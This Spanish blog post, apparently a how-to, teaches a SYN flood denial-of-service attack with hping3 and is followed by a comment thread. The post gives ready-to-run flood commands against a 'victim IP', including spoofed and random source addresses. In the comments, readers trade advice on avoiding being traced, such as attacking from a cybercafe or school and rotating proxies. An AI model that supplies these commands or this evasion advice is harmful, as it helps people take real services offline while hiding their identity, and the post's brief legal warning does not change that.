Ataque DoS (SYN Flood) con Hping3

HPing es una herramienta en linea de comandos que nos permite crear y analizar paquetes TCP/IP, y como tal tiene un muchas utilidades: hacer testing de firewalls, escaneo de puertos, redes y como no… también tiene la capacidad de provocar un SYN Flood Attack mediante denegación de servicio (DoS)

El objetivo de un ataque de este tipo es el envío de peticiones de conexión TCP más rápido de lo que una máquina puede procesar, al fin de saturar los recursos y evitar que la máquina pueda aceptar más conexiones.

Para instalar la ultima versión de hping dependiendo de la distribucion que usemos haríamos:

  • En Debian y derivadas como Ubuntu y Linux Mint.

sudo apt-get install hping3

  • En Fedora

yum install hping3

  • En openSUSE

zypper install hping3

Un ataque clásico de DDoS sería el siguiente

hping3 -p 80  -S --flood ip_victima

donde :

-p 80 es el puerto que elegimos atacar

-S activa el flag Syn

--flood le indica a hping que envie los paquetes a la máxima velocidad posible

ip_victima es la ip o dominio a atacar

Si queremos que nuestra ip no sea visible podemos añadirle la opción -a y la ip que vamos a falsear

hping3 -a ip_falsa -p 80  -S --flood ip_victima

o bien utilizar --rand-source con lo que se generan direcciones de origen ip al azar

Como veis en los ejemplos el testing lo he realizado sobre mi propia red…así que recordaros algo obvio, que los ataques DoS o DDoS son considerados delito en muchos países...por lo que please ser responsables con el uso que le deis.

18 thoughts on “Ataque DoS (SYN Flood) con Hping3”

  1. Pingback: Ddos | TagHall
  2. Trackback: Ddos | TagHall
  3. n4uf4L says:

    A probar…

  4. 2 says:

    buen tutorial!!
    cuando hizo el testing sobre su propia red comprobó que la dirección ip de donde provenía el ataque era la falsa que usted había puesto?

    1. tannhausser says:

      Hace tiempo ya…pero creo recordar, haberlo verificado con netstat en la opción –rand-source
      Saludos!

      1. 2 says:

        vaya que rapido en responer.
        Gracias!!

  5. mario says:

    que buen tutorial lo hice como dijiste pero al final se alento mi red a que se debio amigo?

    1. Pidy says:

      A mi me ha ocurrido algo similar. Desde una red privada, y a través de un router conectado a Internet, he lanzado el ataque desde un pc al servidor.
      El que se ha visto perjudicado ha sido el router, dejandome sin Internet mientras duraba la ejecución del hping3.
      Alguna idea?

  6. Antonio says:

    Tened en cuenta que nunca debéis realizar ataques desde vuestro propio domicilio, ya que aunque uséis la opción de generar paquetes con valores aleatorios en el campo IP origen ocurrirá que podrían cazaros fácilmente debido a que…………………………………………………………………………… (Pensad el por que vosotros. Venga , venga dad respuestas )

    1. Facundo says:

      Es facil no?
      Debido a que lo de (–rand-source) hace un “random” de las IP privadas por ejemplo: si el rango és 192.168.1.X 255.255.255.0-> lo que ara sera randoms de 192.168.1.1 a 192.168.1.254 (sin la addr. de red ni la de brodcast).
      Por lo tanto estamos hablando de un random de IP’s privadas.
      Pero quando los paquetes salen de la LAN osea a l’exterior, se assigna la IP pública, que esta siempre sera la misma osea que los LOGS del servidor que as echo el flood saldra TU IP PUBLICA (cada paquete la misma) con diferntes IP PRIVADAS.
      Osea esto solo tendira sentido hacerlo en un lugar no sea tu casa por ejemplo un cyber, empresa, classe.(asi no se sabria quien ha echo el DoS)
      Tengo razon?
      Perdon por las faltas de ortografia, en la clase solo que que ago es leer pdf relacionadas en seguridad informatica, gano por un lado y pierdo por lotro, no me arrepiento, la informatica és fascinante si te gusta el tema passa horas con el by facundo jejejej bye.

  7. Oswald says:

    Debido a que haces NAT atraves de una IP publica que te asigna tu ISP, la cual siempre es la misma, sin importar que cambies la IP origen dentro de la red.

    1. portaro says:

      Y cual seria la solución a que el ISP reconociera el ip origen al ser unico y no configurable? los DDoS que ano***** hace entonces son peligrosos para los que utilizan Loic?

  8. Cruzhalo says:

    Oigan y no se puede anonimizar esto? es decir se pude configurar algun proxy o algo por el estilo?

    1. Facundo says:

      Sí, yo lo probado con un servidor que tengo en Rusia, tienes que hacer un Scrip con bash , que este vinculado en un archivo .txt lleno de proxys y hacer que en cada 10000paquetes hace un random, un scrip senzillo.
      Saludos

  9. Angel Dario says:

    Hola estoy haciendo un proyecto de fin de master en Vulnerabilidades del DNS y me gustaria saber si me pueden enviar algun material que tenga disponible de como evitar este tipo de ataques y como destectar que estamos bajo este tipo de ataque, agradecería mucho si me pueden ayudar. Gracias mi e-mail es dariowins@gmail.com

  10. Leandro says:

    hping3> hping3 -p 80 127.0.0.1
    [open_sockraw] socket(): Operation not permitted
    [main] can’t open raw socket
    child process exited abnormally

    Entrare como root para ver

  11. ping! says:

    me pasa lo mismo, lanzo el flood, y me bota el internet :S cual es el chiste?

    1. Facundo says:

      Deves usar el –flooder o algo asi, lo que passa que el router se botea porque lo ponnes a full, tienes que reducir los paqutes therts e l’interval para que funcione.

  12. Emanuel says:

    che cuando hago spoofig, el ataque me resulta inútil U_U

Deja un comentario

A %d blogueros les gusta esto: